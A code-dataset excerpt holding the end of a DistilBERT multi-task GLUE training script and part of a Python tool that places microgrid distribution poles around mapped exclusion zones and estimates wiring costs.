5.7k\n\n\n\n# logging\nlog_format = '[%(asctime)s] %(message)s'\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO,\n format=log_format, datefmt='%d %I:%M:%S')\nt = time.time()\nlocal_time = time.localtime(t)\nif not os.path.exists('./log'):\n os.mkdir('./log')\nfh = logging.FileHandler(os.path.join('log/train-{}{:02}{}'.format(local_time.tm_year % 2000, local_time.tm_mon, t)))\nfh.setFormatter(logging.Formatter(log_format))\nlogging.getLogger().addHandler(fh)\n\nuse_gpu=torch.cuda.is_available()\nif use_gpu:\n print(\"Training on GPU.\")\n\ndef main():\n \n \n \n ntasks = len(tasks)\n \n data_args = list()\n configuration = list()\n sub_models = list()\n train_iter = list()\n dev_iter = list()\n test_iter = list()\n sub_optimizer = list()\n metrics = list()\n tokenizer = DistilBertTokenizer.from_pretrained(bert_path, cache_dir=cache_dir)\n \n for i in range(ntasks): \n logger.info(\"Tasks:\" + tasks[i])\n data_args.append(GlueDataArgs(task_name=tasks[i]))\n configuration.append(DistilBertConfig.from_pretrained(bert_path, num_labels=glue_tasks_num_labels[data_args[i].task_name], \n finetuning_task=data_args[i].task_name, cache_dir = cache_dir))\n if use_gpu:\n sub_models.append(SequenceClassification(configuration[i]).cuda())\n else: \n sub_models.append(SequenceClassification(configuration[i]))\n \n train_iter.append(DataIterator(data_args[i], tokenizer=tokenizer, mode=\"train\", cache_dir=cache_dir, batch_size=batch_size[i]))\n dev_iter.append(DataIterator(data_args[i], tokenizer=tokenizer, mode=\"dev\", cache_dir=cache_dir, batch_size=batch_size_val[i]))\n \n sub_optimizer.append(torch.optim.AdamW(sub_models[i].parameters(), lr=learning_rate_0))\n \n metrics.append(ComputeMetrics(data_args[i]))\n \n logger.info(\"*** DataSet Ready ***\")\n \n if use_gpu:\n Bert_model = DistilBertModel.from_pretrained(bert_path, return_dict=True).cuda()\n else:\n Bert_model = DistilBertModel.from_pretrained(bert_path, return_dict=True)\n \n bert_optimizer = torch.optim.AdamW(Bert_model.parameters(), lr=learning_rate_0)\n \n \n # balaned dataset\n train_num = list() \n for i in range(ntasks):\n train_num.append(len(train_iter[i]))\n #train_nummax = \n #train_num = [x/train_nummax for x in train_num]\n #print(train_num)\n iterations = (epochs * max(train_num) // bs) + 1\n #print(iterations)\n \n sub_scheduler = list()\n for i in range(ntasks):\n sub_scheduler.append(torch.optim.lr_scheduler.LambdaLR(sub_optimizer[i], lambda step: (1.0-step/iterations) if step <= frozen else learning_rate_1)) \n Bert_scheduler = torch.optim.lr_scheduler.LambdaLR(bert_optimizer, lambda step: (1.0-step/iterations) if step <= frozen else learning_rate_1)\n \n \n for i in range(1, iterations+1):\n \n \n if i > frozen:\n for p in Bert_model.parameters():\n p.requires_grad = True\n Bert_model.train()\n elif i == frozen:\n for p in Bert_model.parameters():\n p.requires_grad = True\n Bert_model.train() \n logging.info(\"#####################################\")\n logging.info(\"Release the Traing of the Main Model.\")\n logging.info(\"#####################################\")\n else:\n for p in Bert_model.parameters():\n p.requires_grad = False\n Bert_model.eval()\n \n losses=list()\n loss_rates=list()\n for j in range(ntasks):\n sub_models[j].train()\n data = train_iter[j].next()\n \n if use_gpu:\n input_ids=data['input_ids'].cuda()\n attention_mask=data['attention_mask'].cuda()\n #token_type_ids=data['token_type_ids'].cuda()\n label=data['labels'].cuda()\n else:\n input_ids=data['input_ids']\n attention_mask=data['attention_mask']\n #token_type_ids=data['token_type_ids']\n label=data['labels']\n \n output_inter = Bert_model(input_ids=input_ids, attention_mask=attention_mask, return_dict=True) # token_type_ids=token_type_ids,\n losses.append(sub_models[j](input=output_inter, labels=label)[0])\n \n \n losssum = sum(losses).item() \n for j in range(ntasks):\n loss_rates.append(losses[j].item()/losssum)\n \n loss = 0\n printInfo = 'TOTAL/Train {}/{}, lr:{}'.format(i, iterations, Bert_scheduler.get_lr())\n for j in range(ntasks):\n loss += losses[j] * batch_size[j] * loss_rates[j]\n printInfo += ', loss{}-{:.6f}'.format(j,losses[j])\n sub_optimizer[j].zero_grad()\n \n logging.info(printInfo) \n \n if i > frozen:\n bert_optimizer.zero_grad()\n loss.backward()\n \n if i > frozen:\n bert_optimizer.step()\n \n for j in range(ntasks):\n sub_optimizer[j].step()\n sub_scheduler[j].step()\n \n Bert_scheduler.step()\n \n if (i % eval_interval == 0):\n for j in range(ntasks):\n evaluate(Bert_model, sub_models[j], dev_iter[j], batch_size_val[j], metrics[j])\n sub_models[j].save_pretrained(os.path.join(model_save_dir, \"{}-checkpoint-{:06}.pth.tar\".format(tasks[j], i)))\n Bert_model.save_pretrained(os.path.join(model_save_dir, \"{}-checkpoint-{:06}.pth.tar\".format(\"main\", i)))\n \n \n for i in range(ntasks):\n evaluate(Bert_model, sub_models[i], dev_iter[i], batch_size_val[i], metrics[i])\n sub_models[i].save_pretrained(os.path.join(model_save_dir, \"{}-checkpoint-{:06}.pth.tar\".format(tasks[j], iterations)))\n \n Bert_model.save_pretrained(os.path.join(model_save_dir, \"{}-checkpoint-{:06}.pth.tar\".format(\"main\", iterations))) \n \n \n\ndef evaluate(main_model, sub_model, dataset, bs, metrics):\n\n all_labels = []\n all_preds = []\n all_losses = []\n \n iterations = len(dataset) // bs\n \n printInfo = \"*** Evaluation of {:s} ***\".format(metrics.task_name)\n logging.info(printInfo)\n\n with torch.no_grad():\n for i in range(1, iterations+1):\n \n main_model.eval()\n sub_model.eval()\n data = dataset.next()\n \n if use_gpu: \n input_ids = data['input_ids'].cuda()\n attention_mask = data['attention_mask'].cuda()\n # token_type_ids = data['token_type_ids'].cuda()\n label = data['labels'].cuda()\n else:\n input_ids = data['input_ids']\n attention_mask = data['attention_mask']\n # token_type_ids = data['token_type_ids']\n label = data['labels']\n \n output_inter = main_model(input_ids=input_ids, attention_mask=attention_mask, return_dict=True)\n output = sub_model(input=output_inter, labels=label)\n loss = output[0].cpu().numpy().tolist()\n label = label.cpu().numpy().tolist()\n \n softmax_layer = torch.nn.Softmax(dim=1)\n \n if metrics.num_labels == 3: \n pred = [x.index(max(x)) for x in output.logits.cpu().numpy().tolist()]\n elif metrics.num_labels == 2:\n pred = np.round(softmax_layer(output.logits).cpu().t()[1].numpy()).tolist()\n elif metrics.num_labels == 1:\n #print(np.array(label).shape)\n pred = output.logits.cpu().t().numpy().tolist()[0]\n \n # pred = np.round(softmax_layer(output.logits).cpu().t()[1].numpy()).tolist()\n \n \n all_labels += label\n all_preds += pred\n all_losses += [loss]\n \n \n \n \n logging.info(\"loss = {:.6f}\".format(sum(all_losses)/len(all_losses)))\n \n eval_result = metrics.result(np.array(all_labels), np.array(all_preds))\n \n for i in eval_result:\n printInfo = \"{:s} = {:.6f}\".format(i, eval_result[i])\n logging.info(printInfo) \n \n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bert-4ends/distilbert-glue-frozen-mtb.py","file_name":"distilbert-glue-frozen-mtb.py","file_ext":"py","file_size_in_byte":10174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220089537","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 7 14:25:14 2019\r\n\r\n@author: Phy\r\n\"\"\"\r\n\r\n\"\"\"\r\nCreated on Thu Jan 10 09:20:26 2019\r\n\r\nuGrid Net\r\nThe goal is to take the kml file which has highlighted polygons of \"can't build here\"\r\nareas and also an inputted generation station gps location, and determine where\r\nto place distribution poles and how to connect the distribution network together.\r\n\r\nIncluding Reliability Cost-Benefit into layout optimization\r\n\r\n@author: Phy\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport math as m\r\nfrom pdf2image import convert_from_path\r\nfrom PIL import Image\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n\r\n#==============================================================================\r\n#Calculate Distance between GPS coordinates with Haversine Formula (returns in m)\r\ndef GPStoDistance(Lat1,Lat2,Long1,Long2):\r\n R_earth = 6371 #earth's mean radius in km\r\n a = m.sin((Lat1-Lat2)/2)**2 + m.cos(Lat1)*m.cos(Lat2)*m.sin((Long1-Long2)/2)**2\r\n c = 2*m.atan2(m.sqrt(a),m.sqrt(1-a))\r\n d = (R_earth*c)*1000 #m\r\n return d\r\n#===============================================================================\r\n\r\n\r\n#==============================================================================\r\n# Exclusion Mapper using 2nd array instead of increasing list of indexes\r\ndef ExclusionMapper1(ExclusionMap_array,reformatScaler,exclusionBuffer,d_EW_between,d_NS_between,width_new,height_new):\r\n print(\"in exclusion mapper\")\r\n #Extend the exclusions to include the buffer zone\r\n bufferArrayWidth_EW = m.ceil(exclusionBuffer/d_EW_between) #reformatted indexes array width \r\n bufferArrayHeight_NS = m.ceil(exclusionBuffer/d_NS_between)\r\n height_og = len(ExclusionMap_array[:,0,0])\r\n width_og = len(ExclusionMap_array[0,:,0])\r\n new_exclusions = np.zeros((width_new,height_new))\r\n indexes = []\r\n #t0 = time.time()\r\n \r\n for i in range((width_og-1),-1,-1):\r\n k = int((width_og-1-i)/reformatScaler)\r\n #print(str(i))\r\n #t1 = time.time()\r\n #print(str(t1-t0))\r\n for j in range(0,height_og,1):\r\n l = int(j/reformatScaler)\r\n #print(str(i)+\" \"+str(j))\r\n if ExclusionMap_array[j,i,0] != 255: #exclusion zones are both grey and black, safe zones are white (255,255,255)\r\n #set everything within buffer to 1\r\n if k < bufferArrayWidth_EW:\r\n if l < bufferArrayHeight_NS:\r\n new_exclusions[0:k+bufferArrayWidth_EW,0:l+bufferArrayHeight_NS] = 1\r\n elif l > height_og-bufferArrayHeight_NS:\r\n new_exclusions[0:k+bufferArrayWidth_EW,l-bufferArrayHeight_NS:height_new] = 1\r\n else:\r\n new_exclusions[0:k+bufferArrayWidth_EW,l-bufferArrayHeight_NS:l+bufferArrayHeight_NS] = 1\r\n elif k > width_new-bufferArrayWidth_EW:\r\n if l < bufferArrayHeight_NS:\r\n new_exclusions[k-bufferArrayWidth_EW:width_new,0:l+bufferArrayHeight_NS] = 1\r\n elif l > height_og-bufferArrayHeight_NS: \r\n new_exclusions[k-bufferArrayWidth_EW:width_new,l-bufferArrayHeight_NS:height_new] = 1\r\n else:\r\n new_exclusions[k-bufferArrayWidth_EW:width_new,l-bufferArrayHeight_NS:l+bufferArrayHeight_NS] = 1\r\n else:\r\n if l < bufferArrayHeight_NS:\r\n new_exclusions[k-bufferArrayWidth_EW:k+bufferArrayWidth_EW,0:l+bufferArrayHeight_NS] = 1\r\n elif l > height_og-bufferArrayHeight_NS: \r\n new_exclusions[k-bufferArrayWidth_EW:k+bufferArrayWidth_EW,l-bufferArrayHeight_NS:height_new] = 1\r\n else:\r\n new_exclusions[k-bufferArrayWidth_EW:k+bufferArrayWidth_EW,l-bufferArrayHeight_NS:l+bufferArrayHeight_NS] = 1\r\n del ExclusionMap_array\r\n print(\"finished remapping\")\r\n new_exclusions = np.flip(new_exclusions)\r\n \r\n for o in range(width_new):\r\n for p in range(height_new):\r\n if new_exclusions[o,p] == 1:\r\n indexes.append([o,p])\r\n indexes = np.array(indexes)\r\n print(\"finished new indexing\")\r\n\r\n \r\n #Save new indexes\r\n index_csv_name = \"indexes_reformatted_%s_bufferzone_%s.csv\" %(str(reformatScaler),str(exclusionBuffer))\r\n np.savetxt(index_csv_name,indexes, delimiter=\",\")\r\n return indexes\r\n#==============================================================================\r\n\r\n\r\n\r\n#=============================================================================\r\n# Get Distance between array indexes\r\ndef DistanceBWindexes(indexesA,indexesB,d_EW_between,d_NS_between):\r\n if len(indexesA) == 2 and len(indexesB) == 2:\r\n #This is a single index submission\r\n A_sqr = m.pow(((indexesA[0]-indexesB[0])*d_EW_between),2)\r\n B_sqr = m.pow(((indexesA[1]-indexesB[1])*d_EW_between),2)\r\n else:\r\n #This is multiple indexes\r\n A_sqr = np.zeros((len(indexesA), len(indexesB)))\r\n B_sqr = np.zeros((len(indexesA), len(indexesB)))\r\n for i in range(len(indexesA)):\r\n for j in range(len(indexesB)):\r\n #print(indexesA)\r\n A_sqr[i,j] = m.pow(((indexesA[i,0]-indexesB[j,0])*d_EW_between),2)\r\n #print(indexesA[i,0]-indexesB[j,0])\r\n #print((indexesA[i,0]-indexesB[j,0])*d_EW_between)\r\n #print(math.pow(((indexesA[i,0]-indexesB[j,0])*d_EW_between),2))\r\n B_sqr[i,j] = m.pow(((indexesA[i,1]-indexesB[j,1])*d_NS_between),2)\r\n DistanceAB = np.sqrt(A_sqr+B_sqr)\r\n return DistanceAB\r\n#=============================================================================\r\n\r\n#==============================================================================\r\n# Clustering of Connections for Initial Solution Pole Placement\r\ndef ClusteringConnections(indexes_conn,num_clusters):\r\n from sklearn import mixture\r\n \r\n X = np.copy(indexes_conn)\r\n\r\n cv_type = 'tied'\r\n gmm = mixture.GaussianMixture(n_components = num_clusters,covariance_type=cv_type)\r\n gmm.fit(X)\r\n clf = gmm \r\n Y_ = clf.predict(X) #Y_ the index is the connection # and the value is the pole\r\n #gmm.means_: the index is the pole #, the numbers are the indexes of that pole\r\n \r\n #round and convert means to integers\r\n means = np.copy(gmm.means_)\r\n for i in range(len(gmm.means_)):\r\n means[i][0] = int(means[i][0])\r\n means[i][1] = int(means[i][1])\r\n \r\n return Y_ ,means\r\n#==============================================================================\r\n\r\n\r\n#==============================================================================\r\n# Find non-exlcusion spot in growing circular manner\r\ndef FindNonExclusionSpot(index_x_og, index_y_og, index_excl_comp,range_limit,max_y,max_x):\r\n for i in range(range_limit):\r\n #Define limits\r\n x_min = int(index_x_og - i)\r\n if x_min < 0:\r\n x_min = 0\r\n x_max = int(index_x_og + i)\r\n if x_max > max_x:\r\n x_max = max_x\r\n y_min = int(index_y_og - i)\r\n if y_min < 0:\r\n y_min = 0\r\n y_max = int(index_y_og + i)\r\n if y_max > max_y:\r\n y_max = 0\r\n #Testing around spot\r\n #xmin and xmax\r\n for y in range(y_min,y_max):\r\n index_pole_comp = x_min + (y*0.00001)\r\n if not index_pole_comp in index_excl_comp:\r\n return x_min, y\r\n index_pole_comp = x_max + (y*0.00001)\r\n if not index_pole_comp in index_excl_comp:\r\n return x_min, y\r\n #ymin and ymax\r\n for x in range(x_min,x_max):\r\n index_pole_comp = x + (y_min*0.00001)\r\n if not index_pole_comp in index_excl_comp:\r\n return x, y_min\r\n index_pole_comp = x + (y_max*0.00001)\r\n if not index_pole_comp in index_excl_comp:\r\n return x, y_max\r\n \r\n #if nothing found in within range limit, return dummy number\r\n return 9000000,0\r\n#==============================================================================\r\n\r\n\r\n#==============================================================================\r\n# Matching poles and connections by closest distance\r\ndef MatchPolesConn(indexes_conn,indexes_poles,d_EW_between,d_NS_between):\r\n ConnPoles = np.zeros((len(indexes_conn[:,0]),2)) \r\n DistanceConnPoles = DistanceBWindexes(indexes_conn,indexes_poles,d_EW_between,d_NS_between)\r\n for i in range(len(ConnPoles[:,0])):\r\n ConnPoles[i,0] = np.argmin(DistanceConnPoles[i,:])\r\n ConnPoles[i,1] = np.min(DistanceConnPoles[i,:])\r\n return ConnPoles\r\n#==============================================================================\r\n\r\n#===============================================================================\r\n# Match Connections to Poles Simplified Version\r\n#Instead of trying to find a feasible solution, just create penalties that can be weighted in the optimization\r\ndef PolePlacement(reformatScaler,num_clusters,exclusionBuffer,range_limit,indexes_conn,indexes_excl,height,width,d_EW_between,d_NS_between,prob, Cost_kWh, wiring_trans_cost, restoration_time,Long_exc_min,Lat_exc_min): \r\n \r\n #Get initial solution of pole indexes with Gaussian Mean Clustering\r\n #The mean of the clusters is the initial pole placement\r\n ConnPole_initial, initial_pole_placement = ClusteringConnections(indexes_conn,num_clusters)\r\n indexes_poles = np.copy(initial_pole_placement)\r\n #ConnPole: the index is the connection # and the value is the pole\r\n #initial_pole_placement: the index is the pole #, the numbers are the indexes of that pole\r\n\r\n #Check if pole placed on exclusion\r\n #If in exclusion zone, circle outwardly to find non-exclusion spot\r\n #Turn 2D index arrays to 1D for comparison\r\n index_pole_comp = initial_pole_placement[:,0] + np.dot(initial_pole_placement[:,1],0.00001)\r\n index_excl_comp = indexes_excl[:,0] + np.dot(indexes_excl[:,1],0.00001)\r\n for i in range(len(index_pole_comp)):\r\n if index_pole_comp[i] in index_excl_comp:\r\n #check surrounding areas for non-exclusion spot\r\n index_x_new, index_y_new = FindNonExclusionSpot(initial_pole_placement[i,0], initial_pole_placement[i,1], index_excl_comp,range_limit,height,width)\r\n if index_x_new == 9000000: #arbitary large number to act as signal\r\n print(\"No new pole placement found for pole \" +str(i)+\", try expanding pole placement region.\")\r\n else:\r\n #replace pole index location\r\n indexes_poles[i,:] = [index_x_new, index_y_new]\r\n #print(\"New pole placed at \"+str(i)+\" pole\")\r\n \r\n #Match Connections and Poles \r\n ConnPoles = MatchPolesConn(indexes_conn,indexes_poles,d_EW_between,d_NS_between)\r\n #Find in use poles and create new pole indexes\r\n indexes_poles_inuse_x = []\r\n indexes_poles_inuse_y = []\r\n for i in range(len(indexes_poles)):\r\n if i in ConnPoles[:,0]:\r\n indexes_poles_inuse_x.append(indexes_poles[i,0])\r\n indexes_poles_inuse_y.append(indexes_poles[i,1])\r\n indexes_poles_in_use_og = np.transpose(np.array([indexes_poles_inuse_x,indexes_poles_inuse_y]))\r\n #Redetermine match Connections and Poles \r\n ConnPoles = MatchPolesConn(indexes_conn,indexes_poles_in_use_og,d_EW_between,d_NS_between)\r\n #Calculate the wire distances from all the poles and connections\r\n total_wire_distance = sum(ConnPoles[:,1])\r\n #Calculate Cost due to poles and distances\r\n total_distance_BWPoles,Best_Wire_Cost,Best_Reliability_Cost,Best_Total_Cost, OnOff, DistancesBWPoles, num_conn_per_pole, total_time = WiringAlg(ConnPoles,prob, Cost_kWh, wiring_trans_cost, restoration_time,Long_exc_min,Lat_exc_min,indexes_poles,d_EW_between,d_NS_between,\"False\")\r\n totalCost_minusReliability = PenaltiesToCost(total_wire_distance, num_clusters, ConnPoles,total_distance_BWPoles)\r\n totalCost = totalCost_minusReliability + Best_Reliability_Cost\r\n \r\n #Determine if any poles are too close by testing removing each pole\r\n #This takes too long with reliability\r\n #print(\"Testing pole removal\")\r\n Best_pole_indexes = np.copy(indexes_poles_in_use_og)\r\n Best_totalCost = np.copy(totalCost)\r\n Best_ConnPoles = np.copy(ConnPoles)\r\n Best_total_wire_distance = np.copy(total_wire_distance)\r\n Best_total_distance_BWPoles = np.copy(total_distance_BWPoles)\r\n Best_OnOff = np.copy(OnOff)\r\n #for i in range(len(indexes_poles_in_use_og)):\r\n # indexes_poles_in_use = np.delete(indexes_poles_in_use_og,i,0)\r\n # ConnPoles = MatchPolesConn(indexes_conn,indexes_poles_in_use,d_EW_between,d_NS_between)\r\n # total_wire_distance = sum(ConnPoles[:,1])\r\n # total_distance_BWPoles,Best_Wire_Cost,Best_Reliability_Cost,Best_Total_Cost, OnOff, DistancesBWPoles, num_conn_per_pole, total_time = WiringAlg(ConnPoles,prob, Cost_kWh, wiring_trans_cost, restoration_time,Long_exc_min,Lat_exc_min,indexes_poles,d_EW_between,d_NS_between,\"False\")\r\n # totalCost_minusReliability = PenaltiesToCost(total_wire_distance, num_clusters, ConnPoles,total_distance_BWPoles)\r\n # totalCost = totalCost_minusReliability + Best_Reliability_Cost\r\n # if totalCost < Best_totalCost:\r\n # print(\"Removing Pole, cheaper without\")\r\n # Best_pole_indexes = np.copy(indexes_poles_in_use)\r\n # Best_totalCost = np.copy(totalCost)\r\n # Best_ConnPoles = np.copy(ConnPoles)\r\n # Best_total_wire_distance = np.copy(total_wire_distance)\r\n # Best_total_distance_BWPoles = np.copy(total_distance_BWPoles)\r\n # Best_OnOff = np.copy(OnOff)\r\n #print(\"Best total Cost and number of cluster\")\r\n #print(Best_totalCost)\r\n #print(num_clusters)\r\n #print(\"******************\")\r\n \r\n return Best_Reliability_Cost, Best_OnOff, Best_ConnPoles, Best_total_wire_distance, Best_total_distance_BWPoles, Best_pole_indexes, Best_totalCost\r\n\r\n#==============================================================================\r\n \r\n \r\n \r\n\r\n#==============================================================================\r\n# Calculate the Cost of the penalties to use as the minimizing optimization value\r\ndef PenaltiesToCost(total_wire_distance, num_poles_in_use, ConnPoles,total_distance_BWPoles):\r\n #Load all Econ input\r\n Econ_Parameters = pd.read_excel('uGrid_Input.xlsx', sheet_name = 'Econ')\r\n\r\n #Pull out costs needed for penalties\r\n Cost_Dist_wire = Econ_Parameters['Cost_Dist_wire'][0]\r\n Cost_Trans_wire = Econ_Parameters['Cost_Trans_wire'][0]\r\n Cost_Pole = Econ_Parameters['Cost_Pole'][0] + Econ_Parameters['Cost_Pole_Trans'][0]\r\n #Cost_Dist_Board = Econ_Parameters['Cost_Dist_Board'][0]\r\n\r\n #Calculate pole setup cost\r\n total_dist_wire_cost = Cost_Dist_wire*(total_wire_distance/1000) #cost is in km, wire distance is in m\r\n total_trans_wire_cost = Cost_Trans_wire*(total_distance_BWPoles/1000)\r\n #make total_wire_distance doubly as penalty\r\n total_pole_cost = num_poles_in_use*Cost_Pole\r\n #num_dist_boards = 0\r\n meter_cost_poles= []\r\n for j in range(num_poles_in_use):\r\n conn_per_pole = int(np.ceil(np.count_nonzero(ConnPoles[:,0]==j)))\r\n meter_cost = -0.0042*conn_per_pole**5 + 0.1604*conn_per_pole**4 - 2.3536*conn_per_pole**3 + 16.776*conn_per_pole**2 - 59.5*conn_per_pole + 111.25\r\n meter_cost_poles.append(meter_cost)\r\n total_smart_meter_cost = sum(meter_cost_poles)\r\n \r\n Total_cost = total_dist_wire_cost + total_trans_wire_cost + total_pole_cost + total_smart_meter_cost\r\n \r\n return Total_cost\r\n#============================================================================== \r\n \r\n\r\n##=============================================================================\r\n# Decide the number of poles and their places by cycling through PolePlacement\r\ndef PoleOpt(reformatScaler,minPoles,maxPoles,exclusionBuffer,range_limit,MaxDistancePoleConn,repeats,prob, Cost_kWh, wiring_trans_cost, restoration_time):\r\n \r\n #Load Files\r\n #Gather the information needed\r\n #Import csv file which has been converted from the klm file\r\n #This gives the points of connections which are houses to link to the distribution grid\r\n Connect_nodes = pd.read_excel('MAK_connections.xlsx', sheet_name = 'connections')\r\n Exclusion_nodes = pd.read_excel('MAK_exclusions.xlsx', sheet_name = 'MAK_exclusions')\r\n \r\n #Identify gps coordinate min and max to determine coordinates of edges of jpg image\r\n Longitude_exc = Exclusion_nodes['X']\r\n Latitude_exc = Exclusion_nodes['Y']\r\n #also convert these degrees to radians\r\n Lat_exc_min = m.radians(Latitude_exc.min()) #top of image (north)\r\n Lat_exc_max = m.radians(Latitude_exc.max()) #bottom of image (south)\r\n Long_exc_min = m.radians(Longitude_exc.min()) #left of image (east)\r\n Long_exc_max = m.radians(Longitude_exc.max()) #right of image (west)\r\n\r\n #Calculate the distance between the gps coordiantes using Haversine Formula\r\n #North South Distance #measuring latitude difference\r\n d_NS = GPStoDistance(Lat_exc_max,Lat_exc_min,Long_exc_max,Long_exc_max) #m\r\n #East West Distance #measuring longitude difference\r\n d_EW = GPStoDistance(Lat_exc_max,Lat_exc_max,Long_exc_max,Long_exc_min) #m\r\n\r\n #Import kml pdf file (of exclusions) and convert to jpg\r\n pages = convert_from_path('MAK_exclusions.pdf',500)\r\n for page in pages:\r\n page.save('MAK_exclusions.jpg','JPEG')\r\n \r\n #Convert JPG to array\r\n ExclusionMap = Image.open('MAK_exclusions.jpg')\r\n ExclusionMap_array = np.array(ExclusionMap)\r\n #Filter rgb value to 0 'non exclusion' and 1 'exclusion'\r\n #Black 0-0-0, White 255-255-255\r\n height = int(len(ExclusionMap_array[:,0])/reformatScaler) #this is y_index_max\r\n width = int(len(ExclusionMap_array[0,:])/reformatScaler) #this is x_index_max\r\n filename = \"index_maxes_%s.csv\" %str(reformatScaler)\r\n np.savetxt(filename,[height,width],delimiter=\",\")\r\n\r\n #Determine distance between reformatted pixels (between values in the array)\r\n d_EW_between = d_EW/width #m\r\n d_NS_between = d_NS/height #m\r\n filename = \"d_between_%s.csv\" %str(reformatScaler)\r\n np.savetxt(filename,[d_EW_between,d_NS_between],delimiter=\",\")\r\n\r\n #Load exlusion map, if not available then perform\r\n #This gathers the exclusion array indexes\r\n try:\r\n #print(\"in try loop\")\r\n index_csv_name = \"indexes_reformatted_%s_bufferzone_%s.csv\" %(str(reformatScaler),str(exclusionBuffer))\r\n indexes_excl = np.loadtxt(index_csv_name, delimiter=\",\")\r\n except:\r\n print(\"in except loop\")\r\n #quit()\r\n indexes_excl = ExclusionMapper1(ExclusionMap_array,reformatScaler,exclusionBuffer,d_EW_between,d_NS_between,width,height)\r\n\r\n #Match the connection locations to locations in the array\r\n #Find distance between east limit of image and connection\r\n try:\r\n #print(\"in try loop\")\r\n index_csv_name = \"indexes_conn_reformatted_%s.csv\" %str(reformatScaler)\r\n indexes_conn = np.loadtxt(index_csv_name, delimiter=\",\")\r\n except:\r\n d_Econnection = np.zeros(len(Connect_nodes))\r\n d_Nconnection = np.zeros(len(Connect_nodes))\r\n indexes_conn = np.zeros((len(Connect_nodes),2))\r\n for i in range(len(Connect_nodes)): #iteration through connections\r\n d_Econnection[i] = GPStoDistance(Lat_exc_min,Lat_exc_min,Long_exc_min,m.radians(Connect_nodes['longitude'][i])) #m\r\n #print(d_Econnection[i])\r\n #distance of connection to the east (left) (x index)\r\n d_Nconnection[i] = GPStoDistance(Lat_exc_min,m.radians(Connect_nodes['latitude'][i]),Long_exc_min,Long_exc_min) #m\r\n #print(d_Nconnection[i])\r\n #distance of connection to the north (top) (y index)\r\n #Get array index locations of all connections\r\n indexes_conn[i,0] = int(d_Econnection[i]/d_EW_between)\r\n #print(indexes_conn[i,0])\r\n indexes_conn[i,1] = int(d_Nconnection[i]/d_NS_between)\r\n #print(indexes_conn[i,1])\r\n index_csv_name = \"indexes_conn_reformatted_%s.csv\" %str(reformatScaler)\r\n np.savetxt(index_csv_name,indexes_conn, delimiter=\",\")\r\n \r\n #Find Poles, Wiring, and Cost\r\n lookback = 3 * repeats\r\n record_bests = np.zeros((maxPoles-minPoles)*repeats)\r\n p = 0\r\n i = minPoles\r\n NoDecrease = 0\r\n totalCost_soln = 9999999999999 #initialize with very high totalCost_soln\r\n while i < maxPoles and NoDecrease == 0:\r\n for j in range(repeats): #repeat at each cluster level to ensuring repeatability\r\n t0 = time.time()\r\n print(\"Number of poles tried is \"+str(i)+\" with \"+str(j+1)+\" out of \"+str(repeats)+\" attempts.\") \r\n \r\n Reliability_Cost, OnOff, ConnPoles, total_dist_wire_distance, total_trans_wire_distance, indexes_poles, totalCost = PolePlacement(reformatScaler,i,exclusionBuffer,range_limit,indexes_conn,indexes_excl,height,width,d_EW_between,d_NS_between,prob, Cost_kWh, wiring_trans_cost, restoration_time,Long_exc_min,Lat_exc_min)\r\n if totalCost < totalCost_soln and max(ConnPoles[:,1]) < MaxDistancePoleConn:\r\n ConnPole_soln = np.copy(ConnPoles)\r\n total_dist_wire_distance_soln = np.copy(total_dist_wire_distance)\r\n total_trans_wire_distance_soln = np.copy(total_trans_wire_distance)\r\n indexes_poles_soln = np.copy(indexes_poles)\r\n totalCost_soln = np.copy(totalCost)\r\n num_initial_clusters = np.copy(i)\r\n OnOff_soln = np.copy(OnOff)\r\n Best_Reliability_Cost = np.copy(Reliability_Cost)\r\n print(\"Best total cost for this iteration is $\"+str(int(totalCost))+\", and the current best solution is $\"+str(int(totalCost_soln))+\".\")\r\n print(\"The maximum distance between house and pole is \"+str(int(max(ConnPoles[:,1])))+\"m, and limit is \"+str(MaxDistancePoleConn)+\"m.\")\r\n record_bests[p] = totalCost\r\n p += 1\r\n t1 = time.time()\r\n total_time = t1-t0\r\n print(\"Time for this pole count is \"+str(round(total_time, 2))+\".\")\r\n #Check if the solution has not gotten better for the last 3 pole # increases, if so solution is found and exit this loop\r\n if p > lookback:\r\n if min(record_bests[p-lookback:p]) > totalCost_soln:\r\n NoDecrease = 1 \r\n i += 1\r\n \r\n \r\n #Save solution pole indexes\r\n filename = \"indexes_poles_reformatted_%s_prob_%s_FullReliability_soln.csv\" %(str(reformatScaler),str(prob))\r\n np.savetxt(filename,indexes_poles_soln, delimiter=\",\")\r\n filename = \"ConnPoles_reformatted_%s_prob_%s_FullReliability_soln.csv\" %(str(reformatScaler),str(prob))\r\n np.savetxt(filename,ConnPole_soln, delimiter=\",\")\r\n filename_records = \"Wiring_OnOff_alg_prob_%s_FullReliability.csv\" %(str(prob))\r\n np.savetxt(filename_records,OnOff_soln, delimiter=\",\")\r\n \r\n return Best_Reliability_Cost, OnOff_soln,num_initial_clusters,ConnPole_soln, total_dist_wire_distance_soln, total_trans_wire_distance_soln, indexes_poles_soln, totalCost_soln, indexes_conn, indexes_excl\r\n#==============================================================================\r\n \r\n#==============================================================================\r\n# Plot between pole wiring\r\ndef PoleWiring(OnOff, indexes_poles):\r\n\r\n num_poles = len(indexes_poles[:,0])\r\n goodToGo = 0\r\n for i in range(num_poles):\r\n for j in range(i):\r\n if OnOff[i,j] == 1:\r\n match = np.array([[indexes_poles[i,0],indexes_poles[i,1]],[indexes_poles[j,0],indexes_poles[j,1]]]) \r\n if goodToGo == 0:\r\n goodToGo = 1\r\n wiringMatrix = match\r\n else:\r\n wiringMatrix = np.concatenate((wiringMatrix,match),axis=1)\r\n \r\n #Plot\r\n num_match = len(wiringMatrix[0,:])\r\n fig, ax = plt.subplots()\r\n for i in range(0,num_match-1,2):\r\n j = i + 1\r\n plt.plot(wiringMatrix[:,i],wiringMatrix[:,j])\r\n #plt.scatter(indexes_poles[:,0],indexes_poles[:,1],s=2,c='b')\r\n ax.set_aspect('equal')\r\n plotname = \"WiringBWPoles_prob_%s_FullReliability.png\" %(str(prob))\r\n plt.savefig(plotname, dpi=600)\r\n plt.show()\r\n#=============================================================================\r\n \r\n#==============================================================================\r\n# plot all wiring\r\ndef AllWiringPlot(OnOff, indexes_poles, indexes_conn, 